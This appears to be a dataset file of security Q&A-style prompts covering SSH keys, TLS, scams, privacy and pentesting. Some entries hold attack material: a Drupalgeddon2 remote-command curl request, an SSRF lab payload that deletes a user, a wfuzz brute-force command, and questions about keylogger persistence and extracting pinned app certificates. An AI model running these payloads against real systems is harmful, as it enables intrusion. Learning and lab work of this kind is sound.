instruction
stringlengths
24
29.9k
I recently noticed something weird. From time to time I watch on YouTube (Firefox) something political. In my case 'lastweektonight'(left) and 'StevenCrowder'(right), (because it is fun to see, where each party lies). Anyway I noticed, when I watch a video from StevenCroder the next video in line, is always a video fro...
I recently launched a system discovery scan with OpenVAS to an IP from my net to compare its results to Nmap. As you can see in the image OpenVAS does not find all the ports Nmap does. Both scans were all TCP ports scans. Also, both tools are installed in the same Ubuntu machine inside the same net as the scanned IP. ...
In an online malware analysis website called - "Joe Sandbox", I found a few reports of APKS that have the exact same JA3 fingerprint: https://www.joesandbox.com/analysis/103507/0/html https://www.joesandbox.com/analysis/208046/0/html https://www.joesandbox.com/analysis/209043/0/html https://www.joesandbox.com/analysis/...
I accidentally shared my SSH private and public keys with others. I changed keys within 2 minutes of sharing the private key. I've since added a password to access my private key as well as deleted the old private key and created a new one with ssh-keygen. I don't feel this is enough though. Since I expose ssh to the ...
This is a theoretical question about hashes, where I would want to know if the hash(“XY”) would be at risk if I revealed ‘X’. Where X can be a substring. Considering the most perfect hashing algorithm (theoretically speaking).
Just out of curiosity (and because it sounds fascinating) . With all the Snowden revelations, it sounds like nsa has the ability to infect computers with some sort of spyware. I'm asumming these guys are smart enough to build something that spyware scanners can't detect. Or is my assumption wrong on that? Would simpl...
I live on a Caribbean island and i am selling my pick up truck. Someone has contacted me saying they want to buy it and ship to the US.They have asked for all my bank info, IBAN, Swift Code, Acc.#, bank name and address etc... This all seems fishy to me as they can probably find the same truck in the states for cheaper...
So one of the problems with password is that users reuse them or use some weak password. For the latter, even enforcing pattern does not work as users will simply go for something like P@ssw0rd1 that is easy to guess. So instead of a user or email and password login, why not a pin and password? The pin will be generate...
In the administration of advanced iframe I came across following: "Please do not use a different protocol for the iframe: Do not mix HTTP and HTTPS if possible!". Please explain the below points. If the protocol of my page is HTTP than use an HTTP page inside the iframe. If the protocol of my page is HTTPS than use an...
I have been researching on how Windows 10 built their picture password, but there is not much content online. Can anyone here help explain how the picture authentication system in windows 10 works?
I need to know if my motherboard is Opal 2.0 compatible. I have asked the question to it's manufacturer but he answers that he doesn't know, claiming that the tests to determine the Opal 2.0 compatibility haven't been done (and probably won't be done). So how can I know/check if my motherboard is Opal 2.0 compliant ?
Single Sign On in a company means that you have one set of credentials for all the services the company uses / provides to their employees. Logically, these credentials might also be usable for Wifi. Benefits for the employee: Only one password to remember Benefits for the company: Wifi access can be revoked on a per-...
https://www.digitalocean.com/community/tutorials/how-to-serve-flask-applications-with-gunicorn-and-nginx-on-ubuntu-18-04#step-6-%E2%80%94-securing-the-application says for running a flask web application with gunicorn and nginx with https: Certbot provides a variety of ways to obtain SSL certificates through plugins...
In HTTP The Definitive Guide When you establish a secure web transaction through HTTPS, modern browsers automatically fetch the digital certificate for the server being connected to. If the server does not have a certificate, the secure connection fails. When the browser receives the certificate, it checks the s...
We have a web app (Django) that logs users out if they haven't made a request within 1 hour. From a security point of view, is it good practice to also block concurrent log ins? In other words, if a user logs in on his PC and then logs in from their mobile device, should they get logged out of the session on their PC?
In development of a web service, I can use self signed server certificate for testing under HTTPS. How can we make a client (possibly run in the same host, but maybe a different host) work with the service in HTTPS? On Ubuntu 18.04, I try to run a gRPC service in ASP.NET Core. https://stackoverflow.com/a/59702094 says ...
Background: I'm trying to get as much security as possible. I have my hard drive encrypted with BitLocker, but I got worried about leaking something through RAM. Precisely, if someone gets to my laptop when it's turned on but locked, they could still retrieve some data from it's RAM by some cold boot procedure. As far ...
Say I have a vulnerable library on a test machine, is it possible for an attacker to use that vulnerability to exploit the system and maybe the network, if the machine is not open to the internet?
Now this is an interesting one. I just received a forwarded email notification from my data center provider that one of my servers accessed a sink hole that is associated with the nymaim malware. The notification came from the Bundesamt für Sicherheit in der Informationstechnik (BSI), Germany's Cybersecurity Authoritie...
I have an IP camera that has an HTTP panel through which I can watch live recording of the camera. I need to remotely watch my IP camera, but I don’t want to open port 80 on the router, for known security reasons. I want to connect through an SSH tunnel. To create an SSH tunnel is necessary to open port 22 on the rout...
I don't mean a technical breakdown of how the technology works but what does it do for me, the end user. For instance, does it prevent my ISP or network admin from seeing/logging the sites I connect to similar to how HTTPS prevents them from seeing passwords I enter? Does it allow the bypassing of firewalls similar to ...
I have a credit report from TransUnion that contains: My real name, current and past addresses Current and past credit card accounts, last 12 monthly balances and payments My past mortgage Past credit queries by banks and other credit providers A landlord in the United States wishes me to submit this report to him. A...
How do you ensure on a high level that developed software is secure and compliant. We want to introduce a service checklist that will list each item, including "Security and Compliance" section. It will have things/requirements like: No plain-text secrets are present in the source code. Any sensitive data can only be...
I am connecting from my home pc to Windows Server via RDP. Theoretically speaking, if the remote server is compromised, can it somehow automatically infect my home pc? No file transfers, only clipboard sharing, default RDP options.
Given: e-commerce merchant, which fully outsourced payment processing to third-party PCI DSS compliant service NO paper with cardholder data is ever retained Question: should such merchant still be SAQ-A compliant? Or probably more general question: is it possible to fully outsource payment processing to third-party ...
If an application is intended to work only on a machine which is NOT connected to the internet BUT stores extremely confidential information, should we implement same security policy as if it was intended to be exposed to the internet? I'm about to conduct a pentest / audit and thinking what recommendations should be w...
Is this recommended and/or possible? I just don't like the idea of anyone beside me being able to see when I type my password.
Is there such a cryptographic algorithm that will encrypt any file with a password. But when decrypting, if the password is incorrect, the file will be decrypted, but instead of relevant data there will be "garbage". It is important to note that I'm not talking about the ability to generate a file with garbage if the p...
By working on the Wireless QoS (WMM/802.11e), I captured with airmon-ng and airodump-ng on Kali Linux, the 802.11 raw wireless frames, on my BSSID and channel. I generate some traffic from my Wireless client connected to the access point sniffed, but only few frames appear, and very few 802.11 Data frames, which should...
I am a bit confused of how does the "sharing your location" feature works in browsers. Assume I am using Chrome, I have the following questions: When a website prompt the pop-up request "this website want to know your location", when I click "allow", what will the browser do? If I click "do not allow", can the website...
To do SSH to any server we should create private key pair through which we encrypt the connection. Now in SSH we are just doing encryption and here we don't need to verify the server, that's why we are not using the certificate. Now in TLS we also use the private/public key pair. Can we use the same key pair which we u...
I understand that both scans return RST packets and you can use this to scan hosts behind poorly configured firewalls. Is the idea to use both in case the firewall doesn't check for one? For example a firewall might be blocking SYN and FIN packets but due to misconfiguration could use an ACK scan?
I try to solve a pentesting challenge where I have to find out a directory, which is unprotected from directory listing. I tried to find it with wfuzz -c -z file,'wordlist.txt' --hc 404 http://challenge01.root-me.org/realiste/ch3/FUZZ But my wordlist is not suiting the task. Usually you are searching for words like ...
I'm trying to learn techniques used in malware development. Dexphot's advanced techniques, such as the use of fileless execution, polymorphic techniques, and smart and redundant boot persistence mechanisms. source I was searching for the term "redundant boot persistence mechanism", but couldn't find anything usef...
I'm learning android application pen testing and I'm kinda lost about what can do an attacker that control the content of a webview ? I guess if there is no javascript enabled there is no impact, right ? But if there is JavaScript enabled but no JavaScript interface or other dangerous setup, what can do an attacker ? ...
I'm reading a white hat hacking book from a famous certification. They say the methodology for hacking a web server is: information gathering (domain name, DNS, IP, etc.) footprinting (ex: banner grabbing) website mirroring vulnerability scanning session hijacking password cracking Apart from session hijacking and in...
An unknown Google account is signed into Firefox on my Arch Linux machine. The computer is in my apartment (where I live alone) and I lock the screen when I leave. Some observations: The unknown account is has a domain of @pages.plusgoogle.com and a random-number-looking user name. The "Signing in to Google" page for ...
I am trying to wrap my head around gpg. My current understanding is that one generates a master key, and then a number of sub-keys that are cross-signed against the master key. This establishes that the sub-keys are well legitimately 'under' the master key, and gives flexibility to generate / revoke subkeys for differe...
I have two e-mail addresses: email1@domain.com and email2@domain.com. I have a Facebook account that I can log into using email2@domain.com. I recently got an email on email1@domain.com like the one below. It was addressed to someone other me. It seems someone created a Facebook account with email1@domain.com. I have ...
Can an NTFS volume be read by forensics without having to log into the windows user or provide any passwords? aka can data be read straight from the sectors in clear text?
I'm reading openssl manuals, and in the man openssl-ca I've found a note, that "openssl ca is a sample minimal CA application" What does it mean? I don't understand. If it is only a sample, what do I need to use performing CA tasks in a production environment? (It is more complex than CA.pl script)
I know that it's possible to do a passive scan on all channels to see if an access point sends a beacon. However, is it also possible to listen to general Wifi traffic on that channel and assemble a list of all active devices - both "clients" (like smartphone or laptop) and access points?
So I download this budget manager app called Emma, created an account, until it brought me to a login page where I was supposed to enter my back account details.. I didn't expect this, and I wasn't thinking and started to enter my username and password and clicked enter, and turns out the username was incorrect... then...
I am writing here since I have a huge doubt. I am performing a technical security assessment on a custom developed web application (ASP.NET). The application: is Internet-facing Uses HTTPS Uses IIS with NTLM authentication with NTLMSSP message protocol Lack of HSTS ASP.NET framework is not updated (v.4.0.xxx) - this w...
I have to maintain a java application with security code I am not sure is really useful and the original purpose is not clear (and the original developer is long gone). Basically, the code will check some security parameters before allowing the user to do something. There are several methods that do several checks. The...
When you send a text message from a phone with a sim card, is there a log which records your location at the moment, or any other information? is it linked to the phone? to the sim card? to both?
Is there a mechnism that can ensure a deployment (server that can give https responses) is built from the actual (public) sourcecode provided by another https URL? sourcecode from commit #10020 at https://git.localhost/ (contains a file with a signed message?) deployment using the sourecode commit #10020 at https://...
Today I discover a encryption method Which 0 = 35 1 = 34 2 = 37 3 = 36 4 = 31 5 = 30 6 = 33 7 = 32 8 = 3d 9 = 3c It's the encode of number 1 to 0 for the method Can you please help me to find the name of the method?
To elaborate, HTTP basic auth is pretty straightforward - we can skip that. Auth with client certs is cumbersome and unpopular - skip that too. What I am really interested in is: With form-based auth, how does the browser know which HTML page contains fields for credentials, and how does it know which fields to look f...
What is the risk of committing the IdentityFile line for each of my Host entries in my ~/.ssh/config to my public dotfiles repository? Would providing such information make it any easier for an attacker to compromise those keys? cat ~/.ssh/config Host SE Hostname security.stackexchange.com User rage IdentityFile ...
RFC7636 states "The operating systems must allow a custom URI scheme to be registered by multiple applications." Are web apps vulnerable to this attack? Could a web app link open a malicious app via a custom URI scheme?
I bought a USB 3.0 flash drive with a write protection switch for use with a Linux live distribution. My question is, once the OS is installed and running, I tested it and I can still install programs and make other changes to the OS while the write protection switch is on. Shouldn't that make everything read only?
I use KeePass with auto-type, and once in awhile (when tired, etc.) I'll accidentally launch a similarly-named entry's URL and try to logon with the wrong U/P. This question is unrelated to KeePass per se. I'm just wondering if attempted logons are recorded and logged by the "wrong" site, allowing site admins to see an...
Which is harder to exploit: Password reset link with tokens/timestamps/code/ticket etc Or, temporary password sent on user mail using which login can be done and password can be changed. Any suggestions on how they can be exploited please?
When I SSH into it through my local network, and when I actually go and check with ssh-keygen I get 1 rsa fingerprint. And when I try to SSH in though my public IP I get a different host fingerprint shown in putty. This host fingerprint does not appear to be the fingerprint of any of the host keys (or even client keys,...
I have a car loan and wanted to make a payment through their website. To enroll for online payments, it asks for the last 4 numbers of my social security number, birth date and account number, but when I type those fields, it's in plain text. Does that mean if I submit the form, the information is not encrypted?
I am planning to host a flask application on EC2 instance, which connects to a database. The database credentials are inside a folder on the server. EC2 login can be done only via ssh private key. The flask API itself is not ssl secured but when it talks to database its over a secure connection. Is it possible to logi...
In the documentation of the AWS Key Management Service (KMS) I found this interesting sentence: Asymmetric CMKs and asymmetric data key pairs are supported in all AWS Regions that AWS KMS supports except for China (Beijing) and China (Ningxia). There are a total of three AWS regions in China: The two mentioned above,...
I have a Swarm Cluster and want to communicate securely between Windows Worker Nodes. The official Docker Documentation (https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/) states: The nodes in a swarm use mutual Transport Layer Security (TLS) to authenticate, authorize, and encrypt the communications with...
I want to build a custom OTP implementation that utilizes the HOTP/TOTP algorithm. I need to create several codes (one time passwords), which are all valid for the same time window in the future (e.g. five hours), but each code can only be used once. HOTP and TOTP basically work the same way, the difference is that for...
I'm trying to find out a specific request from an android application to its API server. Using Burp Suite, I get a handshake failure alert. Using fiddler it asks me to provide a custom certificate. Now I have used apktool to de-compile the application, and I have found these files: arsalan-ha.quizofkings.com.pem cert...
I have a desktop application written in Python. The application is connects with an external SAP HANA service and pulls data. There are couple of configuration files where several connection string are stored unencrypted as of now. I want to encrypt the config files which should get decrypted when user logs in. I check...
I was reading two answers here on the site about the TLS versions compatibility: The first one says: Basically, for the handshake to succeed, there must be a protocol version that both client and server support. If the client supports only TLS 1.1, and the server supports only TLS 1.2 and SSL 3.0, then there is no...
Our application needs to store a password in a database. It‘s not possible to store a hash because the password is needed to access other data that are protected by this password. Currently, the password is stored encrypted with a key that is part of the code. We are aware that there is no way to store the password in ...
Software libraries targetting resource constrained environments like embedded systems use conditional compilation to allow consumers to shave space and thus increase performance by removing unused features from the final binaries distributed in production. Assume that library developers produced the compiler flags and ...
I am attempting to understand the format for this Salted SHA1 hash for an assignment. The line of text I was given was: nameExample@email.com,nameExample,nameExample@email.com,nameExample,,,aadefeff82b5c1a2272079151dc489822aeaa6ca,7391178a855af48e59ced36447c6bc2b9ade2536,f0c06e699ca51d75d97225fdabf1f04e8d1cffe7,a52e603...
I hope to soon resurrect an old web-site of many years standing: it has the URL xxxx-xxxx.com, and I still rent the domain name. Now I am not anxious to continue hosting it in the USA --- though perfectly happy with hosting other sites there --- and it will be hosted in one of the Baltics on a VPN; this has no b...
The URL with the exercise is: https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter The solution is: http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos A little simplified (no port specified): http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos We can c...
I have this text: Would you mind stopping by the local store and buy some baking soda for tomorrow, Betty-Sue? Betty-Sue has given me her public PGP key, which I have imported and now use to encrypt the text to a PGP message block. Alright. Now I have a "PGP MESSAGE BLOCK" with incomprehensible random-looking characte...
My textbook for CompTIA Security+ has the following practice question: In which one of following PKI Trust Models is the root NOT a single point of failure? Single CA Hierarchical CA Online CA Self-signed Now, I immediately dismissed Single and Hierarchical as wrong. I briefly considered Online, but decided that ha...
I have a root certificate authority, an sub CA and an server. The root ca delivers a certificate for the sub CA. The sub CA delivers a certificate for the server. I want to check all the certification chain, from the server to the root CA with OCSP. The command openssl ocsp -issuer chain.pem -cert server.pem -CAfile ro...
Anybody can share some tips on how to create a nice GDPR data flow mapping and inventory? Any sample diagrams? What diagrams types are best to be used here? Would you show high level diagram and sub-diagrams for each component set? How would you approach it for a bigger system (monolith with dozen of micro-services, se...
The hosting company of a client has shut down their Windows server twice in the past week because the server seems to be sending out massive amounts of outbound encrypted UDP DNS traffic. I have now configured the firewall to block any incoming/outgoing traffic by default and only allowed the necessary ports. This shou...
There's an API server that only allows connections including specific SSL certificates. Talking about an Android application that has those certificates. Using Fiddler without SSL decryption as a proxy between the app and the server, I can see the request being accepted by the server. Now how can I extract that certifi...
I've been using CORS for a while and I think I understand it. But as far as I can tell, because the allow-origin header is provided by the server being called, which an attacker can control as they see fit, same origin policy cannot prevent an injected script from calling an attackers server. Furthermore, by using my o...
I access internet at my workplace with an iPad that has workplace profile installed on it. This allows me to automatically connect to the company wifi, along with their own DNS settings. If I change these settings to a static address, would I be able to have a bit more privacy when I access the web, or will all my acti...
What is the difference between a certificate and a private key? In answering another question on this site, I wanted to point to a canonical answer to this question, but to my surprise I don't see one. Users can be forgiven for getting these terms confused because many applications use the term "certificate" when they ...
I have a YubiKey 5c nano attached to my laptop used for 2FA, etc. It works great and is unobtrusive, but I feel like the small form factor encourages leaving it plugged into the laptop all the time, essentially weakening the two-factor nature of they key... or effectively making my laptop the second factor. I have Yubi...
If a hacker gains access to an encrypted system (Veracrypt, LUKS or any other software) via the internet while the system is running - can they steal the hash from RAM and later use that hash to decrypt the system if they gain physical access to it? From what I know a hacker with physical access to a running system can...
If I'm wiling to test a web application. For what types of vulnerabilities can't a application scanner scan and where can't a application scanner scan (eg. in what property) by its most "forces"? Scanners such as Vega, Nikto, Burp.
My old laptop is possibly infected. But I just want to transfer documents that I have created like Excel or Word files. Is it possible that malware entered into these files making it dangerous to transfer them into my new laptop? Also, can a pendrive get infected when it's connected to the infected laptop? Is it safer ...
I need to implement symmetric encryption to enable secure communication between one program running on a Windows machine (to be written in VB.Net) and an app running on an iOS device (to be written in Swift). I'd like to use a reasonably modern algorithm which is supported in both programming languages "out of the box...
Lots of articles on the net describes how you can join a Linux box to a Windows Active Directory domain, some using "realmd", some using samba and so forth. Others describe how you can do things manually without using realm join or net ads join and so on. When I look at a kerberos keytab file (via ktutil) that was auto...
Let's say, for example, that I have a Gmail account. I compose and send an e-mail to info@somecompany.com. They aren't using Google services, just so that we can exclude "special cases" where they just keep the entire thing internal to their own network. On a technical level, doesn't the e-mail client/software just loo...
I am attempting to disable DEP on a program that will be used in a demonstration of how a basic buffer overflow works. The application is a C++ app written in visual studio and I am running into sections of the program (particularly where the payload is) that are non executable. To my knowledge this should only happen ...
Is there any difference between disk encryption and encrypted file container in terms of security? Which one is better?
This problem is completely different from "running malware in a VM"! Suppose I want to have a virtual machine running some software with secret data. But I do not have complete control of the host machine, i.e. hackers can happily play on the host machine. Then, is it possible that my VM is still safe? For instance, wi...
Just today I'm migrating some of my webpages to a new server. After a couple hours the services was ready, I set up a hosts file with my domain example.com pointing to the server address, went to my browser and navigated to the domain and all worked ok. Just before I made the new server public (by changing the DNS) I n...
I was looking into keyloggers and wanted to understand how does someone get a keylogger to run every time the target computer is active (obviously a program that targets this purpose, but an explanation would help)? I want to know how is this possible and how to do this (for testing purposes).
My assumption is that a BIOS update, while having a TPM activated, would render the computer unusable so that I could trash it unless I can revert the changes to the BIOS. 1) Is it possible to deactivate the TPM, for example in order to install a Bios update, and then activate it again? 2) If it is possible to deactiv...
I have come across certain scenarios which confuses me on how it is possible to manipulate email headers. The person who received an email(A) from person (B), forwarded me (C) the email as Original attachment. Scenario 1: While analysing the email headers I am seeing the From property of the email header is showing C i...
I own an RPG multiplayer game written in Java, where players can fight each other in the game. Recently I planned to invent a new feature, where the last 15 seconds of your fight and the "knockout" will be saved and a gif will be created of the fight's ending and automatically uploaded and can be linked to your accoun...
I have Airtel Broadband PPPoE connection with Public Dynamic IP assigned to my router Dlink DIR 615 (It’s old model and now discontinued). Intermittently I have noticed instances of unusually high uploads from my Internet account. For example in say 10 hours over 80 GB of data gets ‘uploaded’ and against that only a n...
Is it possible to add a subject alternative name when converting PEM certificate to DER format. openssl x509 -outform der -in Certificate.pem -out Certificate.der -extensions SAN -subject-alternative-name 'alternative name' If possible, so how to make this operation with openssl?
In our REST API we write a log entry for every call made, including things like the query string, response code, duration etc... along with a SHA256 hash of the access token used. The thought process behind this is that the hashed values still lets us correlate API calls (e.g. these 5 calls are all made with the same a...
An acquaintance was staying with us a short time ago and I let him use my cell phone to text his girlfriend and listen to music. A week ago he acquired a cell phone of his own. Completely different make/model than mine and using a different service provider. I have just noticed that his text conversations between him a...
I have been looking at potentially disabling the use of all SSL versions, TLS 1.0 and 1.1 across all servers in my environment. However, I have an internal CA that issues SHA-1 based digitally signed certs for internal use only. Is there a potential for impact on the certs if SSL is disabled please? or can SHA-1 signe...
I used zap to scan one of my websites and found a path traversal issue. These are the informations: Attack: c:/ URL: www.example.com/example.php Parameter: mail I am now tinkering around in the browser and in CMD with curl and try to get access to the root, but nothing works. Could it be a false positive? I have don...
I'm trying to use the Drupalgeddon2 exploit (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) on drupal 7.57 ubuntu machine. the requests: -curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami' \ --data "form_id=user_pass&_trigg...
So I'm abroad at the moment, yet I've just had a cash withdrawal made on my credit card from my country of origin, even though I'm not there and the card IS with me abroad. I called the card issuer and they have cancelled the card and are sending me a replacement. They told me that this was definitely a bank machine w...